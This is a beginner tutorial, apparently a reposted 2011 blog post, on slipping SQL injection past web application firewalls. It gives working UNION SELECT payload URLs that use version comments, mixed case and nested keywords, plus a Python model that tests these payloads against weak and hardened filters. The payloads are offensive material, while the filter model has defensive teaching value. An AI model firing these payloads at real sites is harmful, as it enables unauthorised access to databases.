SQL Injection Part 5 – Bypassing WAF (Alibaba Cloud Developer Community)



In my previous posts, I explained the different types of SQL injection. Sometimes, when we try to retrieve data from an SQLi-vulnerable website, the request comes back with a 403 Forbidden error instead of the page. Today I will explain why you get such errors, and how you can get past them and still complete the attack. If you have not read my previous posts and are new to SQLi, I suggest reading them before proceeding.


You can read them here.

What is a WAF?
WAF stands for Web Application Firewall. To block attacks such as SQLi and XSS, administrators put a WAF in front of the web application. The WAF checks each request against a list of rules, typically signature-based filters that look for known attack strings and SQL keywords in the raw input. Because these rules match text patterns rather than parsing the input the way the database will, a request that keeps its SQL meaning but does not look like a signature can slip through, and many such filters are easy to bypass.

How does it work?
When the WAF decides a request is malicious, the URL we submit returns a 403 Forbidden error rather than the page, as shown in the following figure.


Our aim is to get past this block and still retrieve data from the database, using techniques that disguise the injected SQL. There are many ways to bypass a WAF; in this tutorial I will show some basic ones, aimed at beginners.


Methods To Bypass WAF
Comments:-
Comments get us around many WAF restrictions in two ways. MySQL version-conditional comments, written /*! ... */, are treated as ordinary comments by a naive filter (and discarded before matching), but MySQL itself executes their contents as SQL, so a keyword wrapped in one is invisible to the filter yet live at the database. A trailing -- comment then discards the rest of the original query, so the injected statement runs cleanly instead of producing a syntax error.

Actual query
http://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5--+

Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=44 /*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3,4,5--+

In a URL a + decodes to a space, which is why the wrapped keywords are separated by + and why the comment is written --+: MySQL only treats -- as the start of a comment when whitespace follows it.


Capitalization Of Keywords:-
SQL keywords are case-insensitive, but some WAF signatures match only the lowercase spelling, so simply changing the case of the keywords evades them. Any reasonably built WAF folds case before matching, so expect this to work only against poorly written rules.

Actual query
http://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5--+
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5--+

Replaced Keywords:-
Some WAFs do not block the request but "sanitise" it by deleting certain keywords such as UNION, SELECT and ORDER BY, then forward the result to the application. If the deletion is done in a single pass, we can turn this to our advantage by nesting the keyword inside itself: when the filter removes the inner union from UNIunionON, what is left and forwarded is UNION.

Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5--+
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--+
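The signature-matching design described under "What is a WAF?" and the three bypasses above can be modelled in a few lines. The following Python is an added example, not code from the original post or from any WAF product: it implements three deliberately weak filter models (one per bypass), a fourth filter that inspects the request the way MySQL's lexer will read it, and a small approximation of that lexer. The four payloads are constructed to mirror the post's URLs, the keyword list is an assumption, and the lexer model assumes the server version satisfies any /*!NNNNN version suffix. Running it shows which payload gets a working UNION SELECT past which filter.

```python
import re
from urllib.parse import unquote_plus

# Keywords the filter models look for (an assumed, deliberately short list).
KEYWORDS = ("union", "select", "order by")
KEYWORD_RE = re.compile(r"\b(?:union|select|order\s+by)\b", re.I)

# Constructed id= values mirroring the post's URLs. '--+' decodes to '-- ',
# the trailing whitespace MySQL requires after a '--' comment.
PAYLOADS = {
    "plain":    "44 union all select 1,2,3,4,5--+",
    "comments": "44 /*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3,4,5--+",
    "case":     "-1 uNiOn SeLeCt 1,2,3,4,5--+",
    "nested":   "-1 UNIunionON SEselectLECT 1,2,3,4,5--+",
}

# Each WAF model takes the URL-decoded id= value and returns the text it forwards
# to the application, or None when it blocks the request (the post's 403).

def waf_lowercase_signature(value):
    """Case-sensitive substring signatures: beaten by mixed case and by /*!UNION*/."""
    return None if any(kw in value for kw in KEYWORDS) else value

def waf_strip_comments_then_match(value):
    """Discards every /* ... */ as a comment, then matches keywords case-insensitively.
    MySQL executes the inside of /*!...*/, so those keywords are invisible here but live at the DB."""
    visible = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return None if KEYWORD_RE.search(visible) else value

def waf_remove_keywords(value):
    """Sanitises instead of blocking: one case-insensitive deletion pass per keyword
    (PHP str_ireplace style), then forwards the result. Removing the inner 'union'
    from UNIunionON leaves UNION."""
    for kw in KEYWORDS:
        value = re.sub(re.escape(kw), "", value, flags=re.I)
    return value

def as_mysql_sees_it(sql):
    """Approximation of MySQL's lexer (assumes the server satisfies any /*!NNNNN version suffix):
    version-comment contents stay as SQL, ordinary comments vanish, '-- ' and '#' drop the rest."""
    sql = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", sql, flags=re.S)
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.split(r"--\s|#", sql, maxsplit=1)[0]
    return re.sub(r"\s+", " ", sql).strip()

def waf_normalizing(value):
    """Hardened rule: inspect the text the way the database will parse it, case-insensitively,
    and block rather than rewrite. The nested payload is forwarded untouched, which is harmless
    because UNIunionON is not a keyword MySQL recognises."""
    return None if KEYWORD_RE.search(as_mysql_sees_it(value)) else value

def reaches_database(waf, payload):
    """Run a raw id= value through a WAF model; return the SQL fragment MySQL would
    execute, or None if the WAF blocked the request."""
    forwarded = waf(unquote_plus(payload))
    return None if forwarded is None else as_mysql_sees_it(forwarded)

def is_live_union_select(sql):
    """True when the fragment still contains an executable UNION [ALL] SELECT."""
    return sql is not None and re.search(r"\bunion\b(?:\s+all)?\s+select\b", sql, re.I) is not None

def bypasses(waf):
    """Names of the constructed payloads that get a working UNION SELECT past this WAF model."""
    return sorted(name for name, p in PAYLOADS.items()
                  if is_live_union_select(reaches_database(waf, p)))

if __name__ == "__main__":
    for waf in (waf_lowercase_signature, waf_strip_comments_then_match,
                waf_remove_keywords, waf_normalizing):
        print(f"{waf.__name__:32} bypassed by: {', '.join(bypasses(waf)) or 'nothing'}")
```

The keyword-removal model is the only one beaten by UNIunionON, and only because it rewrites and forwards the request instead of blocking it; the normalising rule forwards the same payload untouched, and MySQL then fails on UNIunionON rather than running a UNION. The case and version-comment tricks both fail against the normalising rule because it matches after comment expansion and case folding, which is the minimum a practitioner should expect from any serious WAF.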


I hope you liked this article. Feel free to leave a comment if anything needs clarification.


Read more: http://www.101hacker.com/2011/11/sql-injections-part-5-bypassing-waf.html
